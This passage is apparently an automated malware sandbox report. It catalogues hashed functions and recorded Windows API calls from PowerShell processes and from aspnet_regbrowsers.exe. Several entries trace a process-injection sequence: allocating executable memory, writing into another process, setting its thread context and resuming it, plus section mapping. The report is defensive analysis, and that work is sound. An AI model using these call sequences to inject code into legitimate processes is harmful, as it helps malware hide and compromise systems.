Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a99b2e8c49b82dd00143d06041383121225c0cb7f16aa0714cefd002489f181
Instruction ID: e46438d78755c668e68644488be51f04b970e2cf4c6ba245f3986f63e54d879a
Opcode Fuzzy Hash: 9a99b2e8c49b82dd00143d06041383121225c0cb7f16aa0714cefd002489f181
Instruction Fuzzy Hash: 9D219D74A046498FDB01CFA8D890AEABBB1FF4A310B1585D6D449EB362D335ED45CBA0

Function 04CED005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1325667136.0000000004CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ced000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b712467321b786112b542ce2649117712cd7b07ae11ba1434851f703d7e2673
Instruction ID: 100bb6ac930de9495aea8b8de11e9a68efaeb0b948e6d6879f6abc7c952de7d0
Opcode Fuzzy Hash: 1b712467321b786112b542ce2649117712cd7b07ae11ba1434851f703d7e2673
Instruction Fuzzy Hash: 7E015E7240E3C05FE7128B259D94B62BFB4DF43224F1D81DBD8888F1A3C2695849CB72

Function 04CED01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1325667136.0000000004CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4ced000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d40521a767bf682a38cebf6fb481604b3d1c4c72950a0d2cbe09cc5263bd5f7
Instruction ID: e5863f77b2eaab72982c2cef637045cfa96dbbc6b884a6959b42e6a1081d6068
Opcode Fuzzy Hash: 9d40521a767bf682a38cebf6fb481604b3d1c4c72950a0d2cbe09cc5263bd5f7
Instruction Fuzzy Hash: 2001F7715043419FE7204E13ED84B76BB98DF42224F1CC41AED4A0B142D779A581CAB1

Non-executed Functions

Function 079B1270 Relevance: 5.5, Strings: 4, Instructions: 483COMMON

Download Yara Rule

Strings

Lj, xrefs: 079B1357
Lj, xrefs: 079B1800
Lj, xrefs: 079B1365
Lj, xrefs: 079B180E

Memory Dump Source

Source File: 00000003.00000002.1331962829.00000000079B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_79b0000_powershell.jbxd

Similarity

API ID:
String ID: Lj$Lj$Lj$Lj
API String ID: 0-3439345054
Opcode ID: 012517d998f340356fe579aa30f1e2b14ff477294de1692867c48f9d9325df0c
Instruction ID: 8d8c83d683a2b91996079b740a42044b7bdab75f32306cb1eb4cb7c3cb9503af
Opcode Fuzzy Hash: 012517d998f340356fe579aa30f1e2b14ff477294de1692867c48f9d9325df0c
Instruction Fuzzy Hash: FBF159B2B04219CFDB348B6895207EABBFAAFC6218F14807AD446CB351EB75DC45C791

Function 04E73385 Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

p, xrefs: 04E733AA
p, xrefs: 04E7335A
p, xrefs: 04E7341A
p, xrefs: 04E733EA

Memory Dump Source

Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID: p$p$p$p
API String ID: 0-3467077657
Opcode ID: af55fc4c279489af8e2197d6282dd8f0531c3e080be1e399e79243d9a186aa67
Instruction ID: b6e17d7b8ed86faaf512ba979a7265412dd26d5d5cbaf91e3b2fb309f1f27e15
Opcode Fuzzy Hash: af55fc4c279489af8e2197d6282dd8f0531c3e080be1e399e79243d9a186aa67
Instruction Fuzzy Hash: F031F49281E3D0AFE7135738A8A82D53F614F53168B0A41D7C8E48F1A3E509694EC7B7

Function 04E7348D Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

p, xrefs: 04E73492
p, xrefs: 04E73522
p, xrefs: 04E734F2
p, xrefs: 04E73512

Memory Dump Source

Source File: 00000003.00000002.1326130184.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4e70000_powershell.jbxd

Similarity

API ID:
String ID: p$p$p$p
API String ID: 0-3467077657
Opcode ID: 8ed84599169a13f409906cda79bf74b5eb2f8eb72ff8551b4a0b671ecf60ce23
Instruction ID: ca5d1a892af00e595f88c0476dc5a2d618089383c8d828e3da0bcb6ea7e6a634
Opcode Fuzzy Hash: 8ed84599169a13f409906cda79bf74b5eb2f8eb72ff8551b4a0b671ecf60ce23
Instruction Fuzzy Hash: C62149A281E3D16FE3035B28A8752C57F609E53018F0A41EBC4D08F0A7E549984EC7B7

Analysis Process: powershell.exePID: 6128, Parent PID: 1384COMMON

Executed Functions

Function 033FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2177191713.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6168b11344170d471dab0e428ee0b0415a1a3c55c769e1b3641ef31b3d3915
Instruction ID: 4b80cd61fd7a2e038c6e1fa07d81766f8140482d1e485538868cce1cbd3d0eef
Opcode Fuzzy Hash: ba6168b11344170d471dab0e428ee0b0415a1a3c55c769e1b3641ef31b3d3915
Instruction Fuzzy Hash: BE01F7715043419FE720CE11CDC8B66FB9CEF42224F5CC46AEE490B54AC27D9445CAB2

Function 033FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2177191713.00000000033FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_33fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5bb9f20dc3bd50076a7d845a8389f609ff9591bc2c77dac8e1892ceb83bd3a1
Instruction ID: 61128bd7157c4f9cb1e2b10543408f388e7741dc2721b4fd1637aa4cfc4002fa
Opcode Fuzzy Hash: b5bb9f20dc3bd50076a7d845a8389f609ff9591bc2c77dac8e1892ceb83bd3a1
Instruction Fuzzy Hash: 00012D7240E3C09FD7128B258D94B52BFB4DF43224F1D80DBD9888F1A7C2695849CB72

Function 03463006 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2178273009.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3460000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
Instruction ID: c9c65597f36eb03116de6fc6ec362d6085dbd31ea15c4e3b6c06ff78e55e9a7a
Opcode Fuzzy Hash: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
Instruction Fuzzy Hash: 13F0B235A001099FDB15CF99D890AEEF7B1FF88324F248159E555A72A1C732AC62CB61

Analysis Process: powershell.exePID: 6124, Parent PID: 6128COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41%
Total number of Nodes:	61
Total number of Limit Nodes:	5

Executed Functions

Function 044C941C Relevance: 8.1, APIs: 3, Strings: 1, Instructions: 1053COMMON

Download Yara Rule

Strings

lX , xrefs: 044C9DA9, 044C9E28

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID:
String ID: lX
API String ID: 0-2093460002
Opcode ID: e1a2f6fb952eb1d499d0ce94f8ec85c8ebe30dbcbee87aaf0159aa7efa110517
Instruction ID: 92e16850d6fb827c80d6347ec54d133dc0a1d05d485a0270d25cc1f3869b50cc
Opcode Fuzzy Hash: e1a2f6fb952eb1d499d0ce94f8ec85c8ebe30dbcbee87aaf0159aa7efa110517
Instruction Fuzzy Hash: DA52B275A002189FDF64DF79D8547AEBBB2BF84300F1881AED449A7391DB34AD42CB91

Function 044C2C80 Relevance: .7, Instructions: 746
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d2eac2d1c206e0cb8e09aeca619d36655d243aa11198c09394da83967d8cc32
Instruction ID: 68f918cc1b93e0f6d2f49f3193de25be79424a93bcf8279f29afce68f1285e2f
Opcode Fuzzy Hash: 2d2eac2d1c206e0cb8e09aeca619d36655d243aa11198c09394da83967d8cc32
Instruction Fuzzy Hash: A562F974A01218EFDB55CF98D484A9DBBF2BF49314F28C15AE805AB351D7B1ED82CB90

Function 044C9B40 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 586
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 044C9DCD
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 044C9E4C
ResumeThread.KERNELBASE(?), ref: 044CA062
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 044CA35C

Strings

lX , xrefs: 044C9DA9, 044C9E28

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: AllocVirtual$CreateProcessResumeThread
String ID: lX
API String ID: 1213262536-2093460002
Opcode ID: ceb5439ce5582a9a82e49203d59043a2d94e59234ebf20a70e0bde1ba63f9868
Instruction ID: ca14202f1d449b0efd7ecc70332f281c4111e3ba0ac90761a680d142c4b1b5bd
Opcode Fuzzy Hash: ceb5439ce5582a9a82e49203d59043a2d94e59234ebf20a70e0bde1ba63f9868
Instruction Fuzzy Hash: 24328E74A002189FDF65DF65C844B9EBBB2BF84344F18819AD509BB391DB30AE85CF51

Function 07230B38 Relevance: 2.6, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84Tj, xrefs: 07230B6F
84Tj, xrefs: 07230B63

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID: 84Tj$84Tj
API String ID: 0-1570688683
Opcode ID: c3fe4e61fbc311d378037d9876cd12bcf5463adfbbfd5e066d0fb164b2aa52c5
Instruction ID: 6739407bd82c12988aae9abd8bc23b2245e21b84da3ac14942db7a94c73b1fe9
Opcode Fuzzy Hash: c3fe4e61fbc311d378037d9876cd12bcf5463adfbbfd5e066d0fb164b2aa52c5
Instruction Fuzzy Hash: 274124B0B10365AFDB309B648814B6ABFB3AF85714F18805AE545EF392DA71EC41C7B1

Function 044C86F8 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 044CA35C

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 24890dc8b4794d690550c2778b826fc098dc2a1a673b10d0a5e7d74d2725d76b
Instruction ID: 350c9fabf021d9f2d968c617d2eae7ad2284d5be191fcded0f2457e2a83df395
Opcode Fuzzy Hash: 24890dc8b4794d690550c2778b826fc098dc2a1a673b10d0a5e7d74d2725d76b
Instruction Fuzzy Hash: 6E513B75901229DFEF24CF99C840BDDBBB5BF48304F1484AAE909B7250D771AA85CF90

Function 044C871C Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1867197F,00000000,?,?,?,00000000,00000000,?,044C9EA2,?,00000000,?), ref: 044CA964

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8e2bc32798a3f71942690f5c7778164e600e45cdb8edf918df6579daffdd11cd
Instruction ID: 990bfc48fddadaf2281cc71a0f8bb6c8352746afa005c462dd2523193d284aa3
Opcode Fuzzy Hash: 8e2bc32798a3f71942690f5c7778164e600e45cdb8edf918df6579daffdd11cd
Instruction Fuzzy Hash: 3121E4B69013499FDB10CF9AD885BDEBBF4FB48310F54842AE958A7210D378A944CBA5

Function 044CA8E0 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,1867197F,00000000,?,?,?,00000000,00000000,?,044C9EA2,?,00000000,?), ref: 044CA964

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d5cc5d063b693f9f8e29afb0a95fe96c19dffaa687e2abaef08692d88264dcb4
Instruction ID: 060262a67af0e68f99a6461b29c164b7b0cc56c5f23a0295263ca3adddc7de05
Opcode Fuzzy Hash: d5cc5d063b693f9f8e29afb0a95fe96c19dffaa687e2abaef08692d88264dcb4
Instruction Fuzzy Hash: 9621F5B6900349DFDB10CF9AD885BDEBBF4FB48310F54842AE958A7200D378A544CB65

Function 044C8704 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6252fb841cee6745c55f3906e594e5be75201058cacf820add9e50f818786fd6
Instruction ID: 399f75bbf28f13dad18312983735c4b41ddc4190ad530e368b18449345b41495
Opcode Fuzzy Hash: 6252fb841cee6745c55f3906e594e5be75201058cacf820add9e50f818786fd6
Instruction Fuzzy Hash: E61129B6D002498FDB10DF9AD449BDEBBF4EB88320F54842AD458B3700D778A545CFA5

Function 044C8728 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: baf9535bbeb1433168e61921e45045bede0e4db902f1727a8dfb6f9779a31c73
Instruction ID: 9e8ba0a0c12ff7df777f4eb30bb9d97889f40f89e52e231df99f544f604e2365
Opcode Fuzzy Hash: baf9535bbeb1433168e61921e45045bede0e4db902f1727a8dfb6f9779a31c73
Instruction Fuzzy Hash: A81129B6D002498FDB10DF9AD449BDEBBF5EB88320F14802AD458B3700D778A545CFA5

Function 044CA450 Relevance: 1.6, APIs: 1, Instructions: 56
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,044C9CAA), ref: 044CA4C3

Memory Dump Source

Source File: 0000000A.00000002.1699663724.00000000044C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_44c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 551d6dddca7fd5e6494cd498ee76295e210c854dde66eb4e16454307f421d81e
Instruction ID: 1c04ae68d94f673419ed0283df7a086bb662dba1eb5a58bed1283ced438b957e
Opcode Fuzzy Hash: 551d6dddca7fd5e6494cd498ee76295e210c854dde66eb4e16454307f421d81e
Instruction Fuzzy Hash: 2E1114B6D003498FDB10CF9AC945BDEBBF9EB88320F54842AD458A3600D378A545CFA5

Function 072321E8 Relevance: .6, Instructions: 589COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6401436433ebb16e170a3c89bbb7bef01ceb34c7ee7cb92aa63c3a620c96dec
Instruction ID: 1e811efddf4a7622f76b6d620552b8af70894d7edbf52723f4ad1c262387bf83
Opcode Fuzzy Hash: b6401436433ebb16e170a3c89bbb7bef01ceb34c7ee7cb92aa63c3a620c96dec
Instruction Fuzzy Hash: 241211F1B2430ADFDB24CF68C850BAABBF2BF86210F14806AD555CB251DB75C945CBA1

Function 07231778 Relevance: .3, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118594b4e4a95748caa5de97dde5e75804e4d766e5b58f6ebfa51d26fbd3176e
Instruction ID: a48504912e37080c82e0ab101a2d41e399e438affadcf3e79dea343c8731c998
Opcode Fuzzy Hash: 118594b4e4a95748caa5de97dde5e75804e4d766e5b58f6ebfa51d26fbd3176e
Instruction Fuzzy Hash: 06B148F172470FDFDB258F29881076ABBB6AF82211F24806BD445CB241EB75C961C762

Function 072303E0 Relevance: .3, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2846964d9e09315ddb9cd366a8274a64f01ff2552127aa32af60d9178b36499
Instruction ID: f91aa578faf56f5e3b74dc5160b1221ec04cba53e2b7102bd9feac011fbed2ef
Opcode Fuzzy Hash: e2846964d9e09315ddb9cd366a8274a64f01ff2552127aa32af60d9178b36499
Instruction Fuzzy Hash: A5B134F1B202078FEB348B69841077ABBE7AFC6211F24806BD445DB252DB75C941CBB1

Function 072303C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 906b3a7337a29eb126daff1406f4df75bd1ff079f8f9295d8d97ff4482900bc1
Instruction ID: d6258e6149b8126bdb228f2123d66bf323830a619dd4d66c9571e6f918649d93
Opcode Fuzzy Hash: 906b3a7337a29eb126daff1406f4df75bd1ff079f8f9295d8d97ff4482900bc1
Instruction Fuzzy Hash: 1931C3F1A34207DFEB308E2585107AA7BA6AF92215F144067D914DB292DB75CA81CBB1

Function 072323A8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451d732acfa5981ae3c827c3acd599ae950b9ef3b47147c3258d008a20b95e63
Instruction ID: 86d4067f5d9e0212165be138699365358139edcce97eb4bf01c8fa91f2a6b7f1
Opcode Fuzzy Hash: 451d732acfa5981ae3c827c3acd599ae950b9ef3b47147c3258d008a20b95e63
Instruction Fuzzy Hash: B721AEF0A20207DFEF24CF69C544B6AB7F1FF85210F18806AD9089B221E735D984CB91

Function 07230A92 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e14ade0029b0fb2dbe77a11c706332ffed8d46b85ff6e7ee4b30cf42bcde7a35
Instruction ID: b556bd74c23b84ae5ba1d826e8862928cfcd34c4d5c54c810673571a9d57866c
Opcode Fuzzy Hash: e14ade0029b0fb2dbe77a11c706332ffed8d46b85ff6e7ee4b30cf42bcde7a35
Instruction Fuzzy Hash: 4111A1706092419FD315CB94D864A96FBB2EF86214B19C0DBD558CF293CB32DC42CBA1

Function 07230001 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1749961243.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7230000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5148db05c75828a4163f25f5c4225bd626b01e58c77f322e10e6498c8857e7
Instruction ID: 97ee9dadb8ae47482ce36aa75dcb4cb20f5ce93571fae77a127d41d964c3159e
Opcode Fuzzy Hash: 3d5148db05c75828a4163f25f5c4225bd626b01e58c77f322e10e6498c8857e7
Instruction Fuzzy Hash: 7401E2A615E3D19FE7134770886519A3FB29D4721035A01CBD0D1CF1E3DA28594AC7B3

Function 00B0D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1698925490.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91ddabb939a6ed2a758b842d9259f0941aa576e1909ce10db5963f7306cf4951
Instruction ID: d9404254db57d9a81a5bf237fe93bfdccb9796435e0312141961bb7bad56de34
Opcode Fuzzy Hash: 91ddabb939a6ed2a758b842d9259f0941aa576e1909ce10db5963f7306cf4951
Instruction Fuzzy Hash: 05019E7240E3C05FE7124B218C94792BFA8EF53224F1984DBE8888F1E3D2685C45CB72

Function 00B0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1698925490.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_b0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e9c2a69a0262aadb2473f5fb61d3d9f942b5d6f7b1df63e82bbe88bd7875f52
Instruction ID: e59d012fcdd88075494b560f26b7af1dfddab46701fa906bb74c2f99f125bc87
Opcode Fuzzy Hash: 2e9c2a69a0262aadb2473f5fb61d3d9f942b5d6f7b1df63e82bbe88bd7875f52
Instruction Fuzzy Hash: 0001F7715053409FE7204E51CCC0766BFD8EF42324F28C49AED4D0B1C2D2799881CAB1

Analysis Process: aspnet_regbrowsers.exePID: 8012, Parent PID: 6124COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	57.1%
Total number of Nodes:	56
Total number of Limit Nodes:	2

Executed Functions

Function 004014D6 Relevance: 10.8, APIs: 7, Instructions: 253
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction ID: b0857a4fb145544e41851af17f16183f6357fb9efc2fe45eaf6198d87de3a54a
Opcode Fuzzy Hash: afa16a46a3e1c62dd3975b49d68645ed763654774106451467306ab0cf294d30
Instruction Fuzzy Hash: 8681E171600248BBDB218FA5DC88FEB7FB8FF86710F10416AF951BA1E5D6749901CB64

Function 004014BF Relevance: 10.7, APIs: 7, Instructions: 204
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction ID: cb32da509904316ed93400f6898fa9d135e0c3db95e2781c81c9f365a62fd76c
Opcode Fuzzy Hash: 6f051ce4ba6575236144a0128aa406b27f07ac02e786d19381c723ae0cf33ce2
Instruction Fuzzy Hash: 8D617F71A00244FBEB219F91CC49FAF7BB8FF85B00F10412AF912BA1E4D6749A01DB65

Function 004014E8 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680

Memory Dump Source

Source File: 0000000D.00000002.1777231899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_aspnet_regbrowsers.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
